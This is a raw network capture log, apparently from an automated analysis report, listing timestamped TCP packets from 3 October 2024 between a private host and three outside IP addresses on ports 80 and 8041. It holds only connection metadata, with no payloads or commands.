                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809062004 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809087038 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809118986 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809123993 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809151888 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809186935 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809190989 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809216976 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809556961 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809591055 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809602976 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809623957 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809655905 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809662104 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809689045 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809720039 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809726000 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809752941 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809786081 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809792042 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809818029 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809850931 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809859991 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809885979 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809920073 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.809925079 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.850471020 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.850490093 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.850507021 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.850655079 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.850778103 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.850802898 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.850831032 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.850847960 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.850867033 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.850918055 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891381979 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891484976 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891520023 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891552925 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891592979 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891603947 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891637087 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891644001 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891678095 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891689062 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891706944 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891740084 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891762018 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891789913 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891822100 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891854048 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891855001 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891887903 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891906977 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891935110 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891968012 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.891983986 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892000914 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892040014 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892052889 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892071962 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892103910 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892122030 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892136097 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892168045 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892180920 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892201900 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892235041 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892254114 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892268896 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892318964 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892493010 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892524958 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892559052 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892575979 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892590046 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892622948 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892638922 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892654896 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892689943 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892713070 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892798901 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892831087 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.892855883 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.944454908 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:06.977638006 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:06.977758884 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:06.977890968 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:06.982628107 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.224644899 CEST497058041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.229882956 CEST80414970580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.229979038 CEST497058041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.250796080 CEST497058041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.256164074 CEST80414970580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.851995945 CEST80414970580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.852060080 CEST80414970580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.852099895 CEST497058041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.852133036 CEST497058041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.853204012 CEST497058041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.857642889 CEST497068041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.858087063 CEST80414970580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.862549067 CEST80414970680.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.862647057 CEST497068041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.863010883 CEST497068041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:08.867938995 CEST80414970680.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.497184992 CEST80414970680.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.497262001 CEST497068041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.497525930 CEST80414970680.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.497586012 CEST497068041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.497783899 CEST497068041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.503317118 CEST497078041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.508716106 CEST80414970680.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.514611959 CEST80414970780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.514786005 CEST497078041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.515000105 CEST497078041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.520101070 CEST80414970780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:09.520227909 CEST497078041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:14.868797064 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:14.873714924 CEST80414970882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:14.873816967 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:14.874176025 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:14.878941059 CEST80414970882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.508426905 CEST80414970882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.508486986 CEST80414970882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.508524895 CEST80414970882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.508598089 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.508631945 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.554182053 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.559288025 CEST80414970882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.730331898 CEST80414970882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.730420113 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.751966000 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.757112026 CEST80414970882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.962589979 CEST80414970882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:15.962790966 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.027926922 CEST497098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.033003092 CEST80414970980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.033179045 CEST497098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.033691883 CEST497098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.038547039 CEST80414970980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.653912067 CEST80414970980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.654114962 CEST80414970980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.654154062 CEST497098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.654186010 CEST497098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.654676914 CEST497098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.655150890 CEST497108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.659555912 CEST80414970980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.659998894 CEST80414971080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.660088062 CEST497108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.660490036 CEST497108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:16.665250063 CEST80414971080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.315656900 CEST80414971080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.315778971 CEST497108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.315845013 CEST80414971080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.315890074 CEST497108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.316016912 CEST497108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.316402912 CEST497128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.320810080 CEST80414971080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.321264982 CEST80414971280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.321356058 CEST497128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.321547031 CEST497128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.326622009 CEST80414971280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:17.326677084 CEST497128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:19.437433004 CEST497238041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:19.442433119 CEST80414972380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:19.442554951 CEST497238041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:19.444001913 CEST497238041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:19.448875904 CEST80414972380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.085249901 CEST80414972380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.085356951 CEST497238041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.085505962 CEST80414972380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.085586071 CEST497238041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.085813999 CEST497238041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.089894056 CEST497258041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.090663910 CEST80414972380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.094934940 CEST80414972580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.095027924 CEST497258041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.095448017 CEST497258041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.100521088 CEST80414972580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.717818975 CEST80414972580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.717937946 CEST497258041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.718228102 CEST80414972580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.718498945 CEST497258041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.718528986 CEST497258041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.718919039 CEST497318041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.723292112 CEST80414972580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.723721981 CEST80414973180.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.723823071 CEST497318041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.724019051 CEST497318041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.729212999 CEST80414973180.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:20.729285002 CEST497318041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:22.798954010 CEST497458041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:22.804040909 CEST80414974580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:22.804151058 CEST497458041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:22.804600000 CEST497458041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:22.809417963 CEST80414974580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.424285889 CEST80414974580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.424360991 CEST497458041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.424643993 CEST80414974580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.424698114 CEST497458041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.424922943 CEST497458041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.425491095 CEST497518041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.429699898 CEST80414974580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.430433035 CEST80414975180.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.430516005 CEST497518041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.430851936 CEST497518041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:23.437222004 CEST80414975180.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.053459883 CEST80414975180.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.053544998 CEST497518041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.053576946 CEST80414975180.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.053620100 CEST497518041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.065514088 CEST497518041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.066294909 CEST497538041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.070318937 CEST80414975180.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.071090937 CEST80414975380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.071156979 CEST497538041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.075092077 CEST497538041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.080015898 CEST80414975380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:24.080065012 CEST497538041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.126771927 CEST497698041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.132721901 CEST80414976980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.132818937 CEST497698041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.133076906 CEST497698041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.137865067 CEST80414976980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.779593945 CEST80414976980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.779685020 CEST497698041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.779783010 CEST80414976980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.779845953 CEST497698041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.780237913 CEST497698041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.780633926 CEST497758041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.785073996 CEST80414976980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.785537958 CEST80414977580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.785636902 CEST497758041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.788645029 CEST497758041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:26.793632030 CEST80414977580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.460541010 CEST80414977580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.460719109 CEST497758041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.461119890 CEST497758041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.461448908 CEST80414977580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.461520910 CEST497758041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.461632013 CEST497788041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.466049910 CEST80414977580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.466510057 CEST80414977880.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.466593027 CEST497788041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.466656923 CEST497788041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.471947908 CEST80414977880.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:27.472007036 CEST497788041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:28.522881985 CEST497878041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:28.528014898 CEST80414978780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:28.528096914 CEST497878041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:28.528630018 CEST497878041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:28.533555984 CEST80414978780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.170537949 CEST80414978780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.170618057 CEST497878041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.170661926 CEST80414978780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.170715094 CEST497878041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.172816992 CEST497878041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.173248053 CEST497938041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.177737951 CEST80414978780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.178162098 CEST80414979380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.178241014 CEST497938041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.208034039 CEST497938041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:29.213033915 CEST80414979380.78.24.30192.168.2.5
